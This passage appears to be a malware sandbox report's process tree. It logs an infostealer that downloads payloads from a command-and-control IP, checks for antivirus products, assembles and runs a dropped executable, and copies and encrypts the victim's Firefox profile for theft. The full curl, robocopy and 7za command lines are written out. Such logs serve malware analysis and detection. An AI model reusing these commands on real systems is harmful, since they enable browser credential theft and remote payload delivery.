        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\isrhm" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4232
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\isrhm" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4800
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\islvx" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3836
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\islvx" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4340
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\wwmja" "178.215.224.74/v10/ukyh.php?jspo=7"
        5⤵
        
        PID:1824
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\wwmja" "178.215.224.74/v10/ukyh.php?jspo=7"
        6⤵
        
        PID:1132
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\jkzzn" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4376
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\jkzzn" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4440
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\hwtcp" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
        5⤵
        
        PID:1600
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\hwtcp" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
        6⤵
        
        PID:1328
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\txxef" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4036
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\txxef" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:2904
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\aubqp" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3220
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\aubqp" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4372
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\qjpgi" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
        5⤵
        
        PID:4276
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\qjpgi" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
        6⤵
        
        PID:532
    - - C:\Users\Admin\AppData\Local\temp\RevenueDevices.exe
        
        "C:\Users\Admin\AppData\Local\temp\RevenueDevices.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:344
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy Seek Seek.cmd & Seek.cmd
        6⤵
        
        PID:464
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1388
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa opssvc"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1856
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3276
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1832
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 303482
        7⤵
        
        PID:1040
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "OVERTOOLBARALOTNHL" Weeks
        7⤵
        
        PID:3848
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Norman + ..\Eight + ..\Considerations + ..\Bailey + ..\Parts + ..\Showcase + ..\Samples + ..\Shepherd + ..\Subsection f
        7⤵
        
        PID:4304
        
        C:\Users\Admin\AppData\Local\Temp\303482\Either.pif
        
        Either.pif f
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:5004
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\vhlro" "178.215.224.252/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:5080
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\vhlro" "178.215.224.252/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:4856
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\uhxfd" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:2228
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\uhxfd" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:3440
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\vgnid" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:3384
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\vgnid" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:2608
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\hnrml" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2152
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\hnrml" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D"
        9⤵
        
        PID:4276
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C cd "C:\Users\Admin\AppData\Roaming\DolphinDumps" & azvw.exe -o qyup.zip
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3560
        
        C:\Users\Admin\AppData\Roaming\DolphinDumps\azvw.exe
        
        azvw.exe -o qyup.zip
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1688
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\graws" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:3876
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\graws" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:4408
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ozwtw" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2448
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ozwtw" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:2916
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\zanza" "178.215.224.74/v10/ukyh.php?jspo=8"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4540
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\zanza" "178.215.224.74/v10/ukyh.php?jspo=8"
        9⤵
        
        PID:5088
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\lwvxr" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1840
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\lwvxr" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:2156
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bhuws" "178.215.224.74/v10/ukyh.php?jspo=2021&jwvs=5E79CE1E03B7DB3AE5579E4598D5E6"
        8⤵
        
        PID:2500
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\bhuws" "178.215.224.74/v10/ukyh.php?jspo=2021&jwvs=5E79CE1E03B7DB3AE5579E4598D5E6"
        9⤵
        
        PID:4720
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\lkybe" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:5112
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\lkybe" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:1656
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\zuhnu" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3636
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\zuhnu" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:760
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C robocopy "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy" /E /XF *.lock favicons.sqlite favicons.sqlite-shm favicons.sqlite-wal /XD "Background Tasks Profiles" "Pending Pings" "Crash Reports" bookmarkbackups browser-extension-data features personality-provider settings crashes datareporting extensions minidumps saved-telemetry-pings security_state sessionstore-backups storage weave gmp-widevinecdm gmp-gmpopenh264
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3948
        
        C:\Windows\SysWOW64\Robocopy.exe
        
        robocopy "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy" /E /XF *.lock favicons.sqlite favicons.sqlite-shm favicons.sqlite-wal /XD "Background Tasks Profiles" "Pending Pings" "Crash Reports" bookmarkbackups browser-extension-data features personality-provider settings crashes datareporting extensions minidumps saved-telemetry-pings security_state sessionstore-backups storage weave gmp-widevinecdm gmp-gmpopenh264
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4996
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\oxwuv" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:4736
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\oxwuv" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:5116
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\DolphinDumps\7za.exe a "C:\Users\Admin\AppData\Roaming\DolphinDumps\5E79CE1E03B7DB3AE5579E4598D5E6_ff.7z" -mhe=on "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy\"
        8⤵
        
        PID:5028
        
        C:\Users\Admin\AppData\Roaming\DolphinDumps\7za.exe
        
        C:\Users\Admin\AppData\Roaming\DolphinDumps\7za.exe a "C:\Users\Admin\AppData\Roaming\DolphinDumps\5E79CE1E03B7DB3AE5579E4598D5E6_ff.7z" -mhe=on "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy\"
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4712
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\qeiuv" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3084
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\qeiuv" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:4784
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\kztfr" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:624
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\kztfr" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:4932
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\fhnhz" "178.215.224.74/v10/ukyh.php?jspo=3002&melq=cbac9f82bd5472853a04a9cd0714e6b6*6&jwvs=5E79CE1E03B7DB3AE5579E4598D5E6"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:952
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\fhnhz" "178.215.224.74/v10/ukyh.php?jspo=3002&melq=cbac9f82bd5472853a04a9cd0714e6b6*6&jwvs=5E79CE1E03B7DB3AE5579E4598D5E6"
        9⤵
        
        PID:368
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C rd /s /q "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy\"
        8⤵
        
        PID:1948
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\utkig" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:460
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\utkig" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:4988
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\qvilh" "178.215.224.74/v10/ukyh.php?jspo=2016&jwvs=5E79CE1E03B7DB3AE5579E4598D5E6&bsxa=1"
        8⤵
        
        PID:4512
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\qvilh" "178.215.224.74/v10/ukyh.php?jspo=2016&jwvs=5E79CE1E03B7DB3AE5579E4598D5E6&bsxa=1"
        9⤵
        
        PID:4580
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ckthc" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:844
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ckthc" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:4476
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\tjanu" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:5088
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\tjanu" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:2744
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\xhqoj" "178.215.224.74/v10/ukyh.php?jspo=3002&melq=1393811c93beec3d4db17b1c9bf418a4*2&jwvs=5E79CE1E03B7DB3AE5579E4598D5E6"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2156
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\xhqoj" "178.215.224.74/v10/ukyh.php?jspo=3002&melq=1393811c93beec3d4db17b1c9bf418a4*2&jwvs=5E79CE1E03B7DB3AE5579E4598D5E6"
        9⤵
        
        PID:3368
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\yhbev" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3048
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\yhbev" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:408
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\kuzlq" "178.215.224.74/v10/ukyh.php?jspo=2022&jwvs=5E79CE1E03B7DB3AE5579E4598D5E6"
        8⤵
        
        PID:4912
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\kuzlq" "178.215.224.74/v10/ukyh.php?jspo=2022&jwvs=5E79CE1E03B7DB3AE5579E4598D5E6"
        9⤵
        
        PID:964
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\eyjic" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2688
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\eyjic" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:4500
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:228
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\rinid" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:5056
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\rinid" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1772
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\hzaov" "178.215.224.74/v10/ukyh.php?gi"
        5⤵
        
        PID:1984
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\hzaov" "178.215.224.74/v10/ukyh.php?gi"
        6⤵
        
        PID:1268
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\vsxvn" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4312
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\vsxvn" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1736
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\lsmuq" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3792
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\lsmuq" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:2716
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\utmqx" "178.215.224.74/v10/ukyh.php?jspo=33&jwvs=5E79CE1E03B7DB3AE5579E4598D5E6"
        5⤵
        
        PID:4272
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\utmqx" "178.215.224.74/v10/ukyh.php?jspo=33&jwvs=5E79CE1E03B7DB3AE5579E4598D5E6"
        6⤵
        
        PID:1496
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\tntwf" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5100
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\tntwf" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4476
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\omhnt" "178.215.224.74/v10/ukyh.php?jspo=3&jwvs=5E79CE1E03B7DB3AE5579E4598D5E6&vprl=2"
        5⤵
        
        PID:2156
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\omhnt" "178.215.224.74/v10/ukyh.php?jspo=3&jwvs=5E79CE1E03B7DB3AE5579E4598D5E6&vprl=2"
        6⤵
        
        PID:3008
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:4604
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:3852
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2104
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:768
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:4424
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2432
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\vzutq" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2344
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\vzutq" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4384
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ozpzk" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=5E79CE1E03B7DB3AE5579E4598D5E6&zjyp=true&yuvc=false&nzrj=00000&sftb=true"
        5⤵
        
        PID:4260
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ozpzk" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=5E79CE1E03B7DB3AE5579E4598D5E6&zjyp=true&yuvc=false&nzrj=00000&sftb=true"
        6⤵
        
        PID:4104
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\tzatb" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4888
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\tzatb" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1548
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\kqpui" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4616
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\kqpui" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3436
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\nsdnv" "178.215.224.74/v10/ukyh.php?gi"
        5⤵
        
        PID:2252
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\nsdnv" "178.215.224.74/v10/ukyh.php?gi"
        6⤵
        
        PID:3352
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\dyaws" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:5112
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\dyaws" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4652
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ecgnm" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3388
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ecgnm" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3108
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\cvfsd" "178.215.224.74/v10/ukyh.php?jspo=3&jwvs=5E79CE1E03B7DB3AE5579E4598D5E6&vprl=2"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2344
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\cvfsd" "178.215.224.74/v10/ukyh.php?jspo=3&jwvs=5E79CE1E03B7DB3AE5579E4598D5E6&vprl=2"
        6⤵
        
        PID:4140
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4956
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:996
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:2552
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4216
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1948
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1448
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\kjrel" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1668
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\kjrel" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3792
